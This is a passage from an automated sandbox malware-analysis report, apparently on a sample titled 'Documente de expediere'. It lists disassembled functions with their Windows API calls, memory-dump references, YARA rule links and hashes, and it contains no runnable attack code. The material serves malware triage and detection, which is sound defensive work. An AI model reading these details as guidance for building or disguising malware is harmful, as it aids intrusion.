                                                • Instruction Fuzzy Hash: 6111D336201385EFCB25AF65DC45DBA77BAFF45310B40802AF906CB290EB729951D7A4
                                                Function 006C5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 006C5351
                                                  • Part of subcall function 006B594C: __FF_MSGBANNER.LIBCMT ref: 006B5963
                                                  • Part of subcall function 006B594C: __NMSG_WRITE.LIBCMT ref: 006B596A
                                                  • Part of subcall function 006B594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,006B1013,?), ref: 006B598F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 0525204216d2b94f8e6bea38422ad92cb7c88b27c2f5cade18f7a1d98342491c
                                                • Instruction ID: 1fafe3eea2fa1bd56f13e3ce35780d8a683dcbe0b6c66c98480b73f500511320
                                                • Opcode Fuzzy Hash: 0525204216d2b94f8e6bea38422ad92cb7c88b27c2f5cade18f7a1d98342491c
                                                • Instruction Fuzzy Hash: 5411E272504A15AECB202F64AC04BE9379AEF003A0B10452EF80E9B291EAB599C18358
                                                Function 00694531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00694560
                                                  • Part of subcall function 0069410D: _memset.LIBCMT ref: 0069418D
                                                  • Part of subcall function 0069410D: _wcscpy.LIBCMT ref: 006941E1
                                                  • Part of subcall function 0069410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006941F1
                                                • KillTimer.USER32(?,00000001,?,?), ref: 006945B5
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006945C4
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006CD6CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: 2791045b7af55d82431e3f90529b98cb08b9d79334ac315f394500babee23d42
                                                • Instruction ID: f487ec0422ba931940cf6ada488c76770dbdda019c596875d4997aa75b4d1438
                                                • Opcode Fuzzy Hash: 2791045b7af55d82431e3f90529b98cb08b9d79334ac315f394500babee23d42
                                                • Instruction Fuzzy Hash: F221F570904784AFEB328B648C45FF7BBEDDF01304F00409EE69E56281C7B41A85CB55
                                                Function 006F40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006F40D1
                                                • _memset.LIBCMT ref: 006F40F2
                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006F4144
                                                • CloseHandle.KERNEL32(00000000), ref: 006F414D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                • String ID:
                                                • API String ID: 1157408455-0
                                                • Opcode ID: 7eb53ce48727c45af4b05ffbd52d70fcc5fd7bc823c53dc96013b22bcf37a157
                                                • Instruction ID: 7163b06fc7f8a02323c7a2db4e25addf9a51492b14136a6f0da9a72092c3f60d
                                                • Opcode Fuzzy Hash: 7eb53ce48727c45af4b05ffbd52d70fcc5fd7bc823c53dc96013b22bcf37a157
                                                • Instruction Fuzzy Hash: 9B11AB7590122C7AE7309BA59C4DFFBBB7CEF45760F10419AF908D7290D6744E808BA4
                                                Function 0070667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7B20,?,?,00000000), ref: 00695B8C
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7B20,?,?,00000000,?,?), ref: 00695BB0
                                                • gethostbyname.WSOCK32(?,?,?), ref: 007066AC
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007066B7
                                                • _memmove.LIBCMT ref: 007066E4
                                                • inet_ntoa.WSOCK32(?), ref: 007066EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 1504782959-0
                                                • Opcode ID: 522c6609b6a743f59a7c51fdf3cfb9c23e154282e8722329431cec85f33850ec
                                                • Instruction ID: 970f45a5c392e9db7944ade2c731a259ae7dc4848f653393a1207cdb6b767193
                                                • Opcode Fuzzy Hash: 522c6609b6a743f59a7c51fdf3cfb9c23e154282e8722329431cec85f33850ec
                                                • Instruction Fuzzy Hash: 43117975900508AFCF41FBA8D996DEEB7BDAF14310B048129F502A72A1DF34AE14CB69
                                                Function 006E9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 006E9043
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E9055
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E906B
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E9086
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
                                                • Instruction ID: 9f1986e03a525d5e18e75caab1b8b231dfea9f33f4f63582299ff63f3cdbb2ca
                                                • Opcode Fuzzy Hash: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
                                                • Instruction Fuzzy Hash: 69114C79901218FFDB10DFA5C885EDDBB75FF48310F204095E904B7290D6716E50DBA4
                                                Function 00691290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
                                                • GetClientRect.USER32(?,?), ref: 006CB84B
                                                • GetCursorPos.USER32(?), ref: 006CB855
                                                • ScreenToClient.USER32(?,?), ref: 006CB860
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: 29e11118999fc81400ff1e106778d97f43170ac3e169084c0a67c5bf95c882d5
                                                • Instruction ID: 1855b7f3ae47d8cc2f07bd61ca654d9ff514479228015685bac14a3fd611b522
                                                • Opcode Fuzzy Hash: 29e11118999fc81400ff1e106778d97f43170ac3e169084c0a67c5bf95c882d5
                                                • Instruction Fuzzy Hash: A2112B3550001AABCF00EFA8D8859FE77BEEB06301F5044A5F901EB651C734BA918BA9
                                                Function 006F1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F166F
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F1694
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F169E
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,006F01FD,?,006F1250,?,00008000), ref: 006F16D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: 075d6985c50f6ce019c02c5ba472c40663038e0dec70580b4822356b3478ec6f
                                                • Instruction ID: ca149cad7f93e67fce6e1b53f592c1c40aad37d6f82f411b666e5f69d0e50a21
                                                • Opcode Fuzzy Hash: 075d6985c50f6ce019c02c5ba472c40663038e0dec70580b4822356b3478ec6f
                                                • Instruction Fuzzy Hash: AC115231D0051DE7CF009FA5D944AFEBF79FF0A791F158159DA40FA240CB3455509B9A
                                                Function 006C7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: f60e21115057fde5e422975fb29557482437150954833999394424eb78964b72
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: 16017B3204814ABBCF525F85DC01DEE3F27FF29340B088619FA1858131C23ACAB1AF81
                                                Function 0071B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 0071B59E
                                                • ScreenToClient.USER32(?,?), ref: 0071B5B6
                                                • ScreenToClient.USER32(?,?), ref: 0071B5DA
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0071B5F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
                                                • Instruction ID: 21c421c107557cf3811dd61183703eba57afab117af3351d027bfa1215fc3003
                                                • Opcode Fuzzy Hash: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
                                                • Instruction Fuzzy Hash: 811146B9D00209EFDB41CF99C4449EEFBB5FB08310F108166E914E3260D735AA658F54
                                                Function 0071B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0071B8FE
                                                • _memset.LIBCMT ref: 0071B90D
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00757F20,00757F64), ref: 0071B93C
                                                • CloseHandle.KERNEL32 ref: 0071B94E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                • Opcode ID: f04b2c087b47664b3e26d7e70e0c79da134d970278a30bfcd6907f5f9b2a1862
                                                • Instruction ID: c467f396b383791030c6b734de096301e2694f1020d796e58badf61dd2570c49
                                                • Opcode Fuzzy Hash: f04b2c087b47664b3e26d7e70e0c79da134d970278a30bfcd6907f5f9b2a1862
                                                • Instruction Fuzzy Hash: 74F05EF2644310BBE210AB65BC06FFB3A5DEB08355F008031FA09D52E2D7BA5901C7AC
                                                Function 006F6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 006F6E88
                                                  • Part of subcall function 006F794E: _memset.LIBCMT ref: 006F7983
                                                • _memmove.LIBCMT ref: 006F6EAB
                                                • _memset.LIBCMT ref: 006F6EB8
                                                • LeaveCriticalSection.KERNEL32(?), ref: 006F6EC8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                • String ID:
                                                • API String ID: 48991266-0
                                                • Opcode ID: ecb43adb0bb6f8bd4c1f7a4f6516a6529a20a3c965a341317f939b3bdcb7584c
                                                • Instruction ID: 10ef9b025a2242a3d789ccf9e9905df2c35a3d63d1ad7d0de73b2b2eac31da6f
                                                • Opcode Fuzzy Hash: ecb43adb0bb6f8bd4c1f7a4f6516a6529a20a3c965a341317f939b3bdcb7584c
                                                • Instruction Fuzzy Hash: EDF05E7A200214BBCF416F55DC85A9ABB2AFF45320B04C065FE085F26ACB75A951DBB8
                                                Function 0071C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006912F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069135C
                                                  • Part of subcall function 006912F3: BeginPath.GDI32(?), ref: 00691373
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069139C
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0071C030
                                                • LineTo.GDI32(00000000,?,?), ref: 0071C03D
                                                • EndPath.GDI32(00000000), ref: 0071C04D
                                                • StrokePath.GDI32(00000000), ref: 0071C05B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: 6958861c2280b13c287139456d8cd6791b2585e8a6986f6ba501f315ddbe5df8
                                                • Instruction ID: b2e8191c150d1cf630876d010172bd0e5264d9daf3b4f6fc4c25b1c7f7e801cf
                                                • Opcode Fuzzy Hash: 6958861c2280b13c287139456d8cd6791b2585e8a6986f6ba501f315ddbe5df8
                                                • Instruction Fuzzy Hash: E1F05E31141269BBDB126F98AC0AFCE3F59AF1A311F14C000FA15650E2C7BD5691DB99
                                                Function 006EA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006EA399
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006EA3AC
                                                • GetCurrentThreadId.KERNEL32 ref: 006EA3B3
                                                • AttachThreadInput.USER32(00000000), ref: 006EA3BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: f3b079e1a4b2fe3201157bf0206f951b16afbeb10a76f7cf65091b4e1483d14f
                                                • Instruction ID: 38ddb9b161bf251442d1ae927e333dbc4fc91ea7cdb47a432b1cbe6a3bf3a4c1
                                                • Opcode Fuzzy Hash: f3b079e1a4b2fe3201157bf0206f951b16afbeb10a76f7cf65091b4e1483d14f
                                                • Instruction Fuzzy Hash: B1E06D31142368BADB201FA6DC0DED73F2DEF167A1F00C024F508C40A0C675D540DBA5
                                                Function 00692218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00692231
                                                • SetTextColor.GDI32(?,000000FF), ref: 0069223B
                                                • SetBkMode.GDI32(?,00000001), ref: 00692250
                                                • GetStockObject.GDI32(00000005), ref: 00692258
                                                • GetWindowDC.USER32(?,00000000), ref: 006CC0D3
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 006CC0E0
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 006CC0F9
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 006CC112
                                                • GetPixel.GDI32(00000000,?,?), ref: 006CC132
                                                • ReleaseDC.USER32(?,00000000), ref: 006CC13D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: 8aacfdb4e9216505138f29fcdf25fc072ab17312db1a39c8d7b462aa66226268
                                                • Instruction ID: a036708f3935a8c29390b9e99e3bb6e8558169f7a2682f3c079d9a51fe2c10e1
                                                • Opcode Fuzzy Hash: 8aacfdb4e9216505138f29fcdf25fc072ab17312db1a39c8d7b462aa66226268
                                                • Instruction Fuzzy Hash: 47E03031104144FADB215F68EC09BD83B15EB05332F14C366FA69880E1C7754590DB11
                                                Function 006E8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 006E8C63
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,006E882E), ref: 006E8C6A
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006E882E), ref: 006E8C77
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,006E882E), ref: 006E8C7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
                                                • Instruction ID: fc3b123762660f7b0ddf1e27c0ea6d7485a9bb92bd5f25e212179d41c5b3b1a8
                                                • Opcode Fuzzy Hash: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
                                                • Instruction Fuzzy Hash: F8E04F366423119FD7205FB56E0CBD63BA8AF55B92F15C828E649CA090DA3894418B65
                                                Function 006D2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 006D2187
                                                • GetDC.USER32(00000000), ref: 006D2191
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006D21B1
                                                • ReleaseDC.USER32(?), ref: 006D21D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
